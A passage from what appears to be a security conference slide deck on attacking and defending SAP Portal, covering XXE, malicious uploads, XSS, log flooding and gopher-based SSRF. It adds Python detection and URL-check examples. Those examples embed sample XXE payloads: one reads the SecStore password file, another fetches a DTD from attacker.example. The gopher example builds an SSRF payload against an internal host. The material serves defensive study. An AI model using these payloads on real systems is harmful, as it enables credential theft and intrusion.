• But this must be correlated with the real user's activity
• False positives are possible:
  - a new legitimate user
  - an old user who clears the cache
  - other
43. XXE in Portal: Details
• Injection of external entity declarations into the XML that the server parses
• Can lead to unauthorized file read, DoS and SSRF
• There is an XXE vulnerability in SAP Portal
• It can be exploited by modifying a POST request
• It is possible to read any file the J2EE Engine's OS user can read, and much more
44. XXE in Portal: Attack (screenshot)
45. XXE in Portal: Details (screenshot)
46. XXE in Portal: Attack (screenshot)
47. XXE in Portal: Result
• We can read any file
• Including configuration files with passwords
• The SAP J2EE Engine keeps the password of its database user SAP<SID>DB in the secure store file /usr/sap/<SID>/SYS/global/security/data/SecStore.properties (encrypted with the key in SecStore.key in the same directory)
48. XXE in Portal: Prevention
• Install SAP Note 1619539
• Restrict read access to the files SecStore.properties and SecStore.key
50. XXE in Portal: Forensics
• The only way to get the values of HTTP POST requests is to enable HTTP tracing
• Visual Administrator → Dispatcher → HTTP Provider → Properties: HttpTrace = enable
  - For 6.4 and 7.0 up to SP12:
    o On the dispatcher: /j2ee/cluster/dispatcher/log/defaultTrace.trc
    o On the server: j2ee/cluster/server0/log/system/httpaccess/responses.0.trc
  - For 7.0 SP13 and higher: /j2ee/cluster/dispatcher/log/services/http/req_resp.trc
• The traced requests then have to be analysed manually for XXE payloads
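Once the request bodies are in the trace, the manual analysis the slide mentions can at least be narrowed down: an XXE payload needs an inline DOCTYPE, and in practice an external (SYSTEM/PUBLIC) entity, a file:/http:/gopher: URI, or a parameter-entity reference. The scanner below is an added example, not from the slides. The layout of req_resp.trc is not shown on the slides, so the input is a constructed list of (client, request id, body) tuples as if already extracted from the trace; the XML bodies, the SID "NW1" in the path and the host attacker.example are constructed as well.

```python
"""Flag XXE payloads in traced POST bodies.

Added example, not from the slides. The req_resp.trc layout is not shown on
the slides, so TRACE below is a constructed list of (client, request id, body)
tuples as if already pulled out of the trace. The XML bodies, the SID 'NW1'
in the file path and the host 'attacker.example' are constructed too.
"""
import re

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.I)
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<param>%\s*)?(?P<name>[\w.-]+)\s+(?P<kind>SYSTEM|PUBLIC)\s+"
    r"(?P<uri>\"[^\"]*\"|'[^']*')", re.I)
SCHEME_RE = re.compile(r"^\s*(file|https?|ftp|gopher|jar|netdoc)\s*:", re.I)
PARAM_REF_RE = re.compile(r"%[\w.-]+;")
SENSITIVE_FILES = ("SecStore.properties", "SecStore.key", "/etc/passwd", "/etc/shadow")

BODY_FILE_READ = """<?xml version="1.0"?>
<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///usr/sap/NW1/SYS/global/security/data/SecStore.properties"> ]>
<data><name>&xxe;</name></data>"""

BODY_BLIND = """<?xml version="1.0"?>
<!DOCTYPE data [ <!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd"> %dtd; ]>
<data><name>x</name></data>"""

BODY_BENIGN = """<?xml version="1.0"?><data><name>quarterly report</name></data>"""

TRACE = [
    ("192.168.192.14", "req-0001", BODY_FILE_READ),
    ("192.168.192.14", "req-0002", BODY_BLIND),
    ("192.168.192.50", "req-0003", BODY_BENIGN),
]


def xxe_indicators(body):
    """List of reasons a body looks like an XXE attempt; empty when it does not."""
    reasons = []
    if not DOCTYPE_RE.search(body):
        return reasons           # entities can only be declared inside a DOCTYPE
    reasons.append("inline DOCTYPE in request body")
    for m in ENTITY_RE.finditer(body):
        uri = m["uri"][1:-1]
        reasons.append("%s entity %s%s -> %s"
                       % (m["kind"].upper(), "%" if m["param"] else "", m["name"], uri))
        s = SCHEME_RE.match(uri)
        if s:
            reasons.append("external scheme %s in entity" % s.group(1).lower())
        for f in SENSITIVE_FILES:
            if f in uri:
                reasons.append("entity targets sensitive file %s" % f)
    if PARAM_REF_RE.search(body):
        reasons.append("parameter entity reference (blind / out-of-band XXE pattern)")
    return reasons


def scan_trace(entries):
    """One hit per suspicious (client, request id, body) entry, with its reasons."""
    return [{"client": c, "request": r, "reasons": xxe_indicators(b)}
            for c, r, b in entries if xxe_indicators(b)]


if __name__ == "__main__":
    for hit in scan_trace(TRACE):
        print(hit["client"], hit["request"])
        for reason in hit["reasons"]:
            print("   -", reason)
```

A DOCTYPE in a request body is rare enough in Portal traffic that the first indicator alone is worth an alert; the others mainly tell the analyst what the payload was after.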
51. Malicious file upload: Attack
• Knowledge Management allows uploading different types of files to the server, and they can carry malicious content
• Sometimes, if guest access is allowed, any file can be uploaded without being an authenticated user
• For example, an HTML file with JavaScript that steals cookies
53. Malicious file upload: Attack (screenshot)
54. Malicious file upload: Forensics

[Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 : POST /irj/servlet/prt/portal/prteventname/HtmlbEvent/prtroot/pcd!3aportal_content!2fspecialist!2fcontentmanager!2fContentManager!2fcom.sap.km.ContentManager!2fcom.sap.km.ContentExplorer!2fcom.sap.km.ContentDocExplorer!2fcom.sap.km.DocsExplorer/documents HTTP/1.1 200 13968
[Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET /irj/go/km/docs/etc/public/mimes/images/html.gif HTTP/1.1 200 165

* Again, the images help: the POST to the Content Manager's documents view is followed one second later by the icon for an HTML document
55. Malicious file upload: Prevention
• Enable the File Extension and Size Filter
  - System Administration → System Configuration → Content Management → Repository → Filters → Show Advanced Options → File Extension and Size Filter
  - You must select either the All repositories parameter or at least one repository from the repository list in the Repositories parameter; otherwise the filter is not created
• Enable the Malicious Script Filter
  - System Administration → System Configuration → Content Management → Repository → Filters → Show Advanced Options → Malicious Script Filter
  - The filter also detects executable scripts in files that are being modified and encodes them when they are saved
    o Set Forbidden Scripts: a comma-separated list of banned script tags that will be encoded when the filter is applied
    o Enable the Send E-Mail to Administrator option
56. Filtering EPCF in XSS
• EPCF (Enterprise Portal Client Framework) provides a JavaScript API for client-side communication between Portal components and the Portal core framework
• EPCM (Enterprise Portal Client Manager) is its entry object
• iViews can access the EPCM object from every page; every iView contains the EPCM object
• For example, EPCF is used to pass the user data buffer to iViews, so any script that reaches the page can read it:

<SCRIPT>alert(EPCM.loadClientData("urn:com.sap.myObjects","person"));</SCRIPT>
57. Advanced attacks: Anti-forensics
• If all tracing is enabled, it slows the system down
• It can also fill the whole storage volume
• An attacker who wants to flood the logs with trash values can do it much faster against traced request bodies than against GET-only logs
58. Securing SAP Portal
• Patching
• Secure configuration
• Enabling HTTP Trace with masking
• Malicious script filter
• Log archiving
• An additional place for log storage
• Correlation of security events
59. Portal post-exploitation
And one more thing:
• The Portal has connections to a lot of systems in the corporate LAN
• Using SSRF, attackers can get access to these systems
60. SSRF attacks (diagram): a direct attack sends GET /vuln.jsp to the HTTP server itself; in an SSRF attack the HTTP server is made to send GET /vuln.jsp on to a host inside the corporate network (the two paths are labelled A and B)
61. Gopher URI scheme
Using the gopher:// URI scheme, it is possible to send arbitrary TCP packets:
• Exploit OS vulnerabilities
• Exploit old SAP application vulnerabilities
• Bypass SAP security restrictions
• Exploit vulnerabilities in local services
More info in our BH2012 presentation, SSRF vs. Business Critical Applications:
http://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-Businness-critical-applications-whitepaper.pdf
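The reason gopher:// turns a URL fetch into "arbitrary TCP" is a detail of the Gopher protocol: the client sends the URL's selector followed by CRLF, and the first character after the slash is the item type, which is discarded, so every byte after it reaches the socket verbatim. The script below, an added example and not part of the slides or the whitepaper, builds such a URL from raw bytes, shows what a client would put on the wire, and pairs that with the check a server should run before fetching a user-supplied URL (scheme allowlist plus a public-address test on the resolved host). Hosts, ports and the payload are constructed.

```python
"""Why gopher:// matters for SSRF, and the outbound-URL check that blocks it.

Added example, not from the slides or the whitepaper; hosts, ports and the
payload are constructed. gopher_url() builds a URL that makes a Gopher client
deliver raw bytes, wire_bytes() shows what such a client sends, and
is_safe_outbound() is the check to run before a server fetches a URL a user
handed it.
"""
import ipaddress
import socket
from urllib.parse import quote, unquote_to_bytes, urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def gopher_url(host, port, payload):
    """URL that makes a gopher-capable client deliver `payload` (bytes) to host:port.
    '_' is the Gopher item type; it is dropped by the client."""
    return "gopher://%s:%d/_%s" % (host, port, quote(payload, safe=""))


def wire_bytes(url):
    """Bytes a Gopher client sends for `url`: the decoded selector plus CRLF."""
    path = urlsplit(url).path
    selector = path[2:] if len(path) >= 2 else ""   # drop leading '/' and the item type
    return unquote_to_bytes(selector) + b"\r\n"


def is_safe_outbound(url, resolve=socket.gethostbyname):
    """True only for http(s) URLs whose host is a public address.
    `resolve` maps a hostname to an IP; the caller must then connect to that
    same IP, otherwise a DNS rebinding can undo the check."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not parts.hostname:
        return False
    try:
        ip = ipaddress.ip_address(parts.hostname)
    except ValueError:
        try:
            ip = ipaddress.ip_address(resolve(parts.hostname))
        except (OSError, ValueError):
            return False
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


if __name__ == "__main__":
    payload = b"GET /vuln.jsp HTTP/1.0\r\nHost: 10.0.0.5\r\n\r\n"   # constructed internal target
    url = gopher_url("10.0.0.5", 8080, payload)
    print(url)
    print(wire_bytes(url))
    print(is_safe_outbound(url, resolve=lambda h: h))                 # False: gopher is not allowed
    print(is_safe_outbound("https://www.sap.com/", resolve=lambda h: "8.8.8.8"))
```

Blocking gopher:// is necessary but not sufficient: with http:// alone an attacker still reaches internal web servers, which is what the address test is for.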
62. Conclusion
It is possible to protect yourself from these kinds of issues, and we are working closely with SAP to keep customers secure.
SAP Guides
It's all in your hands:
• Regular security assessments
• ABAP code review
• Monitoring of technical security
• Segregation of Duties
63. Future work
I'd like to thank SAP's Product Security Response Team for the great cooperation in making SAP systems more secure. Research is always ongoing, and we can't share all of it today. If you want to be the first to see new attacks and demos, follow us at @erpscan and attend our future presentations:
• May 21 – Training at AusCERT (Gold Coast, Australia)
• June 5-6 – Presentation at RSA (Marina Bay Sands, Singapore)
• September 10-12 – BlackHat Trainings (Istanbul, Turkey)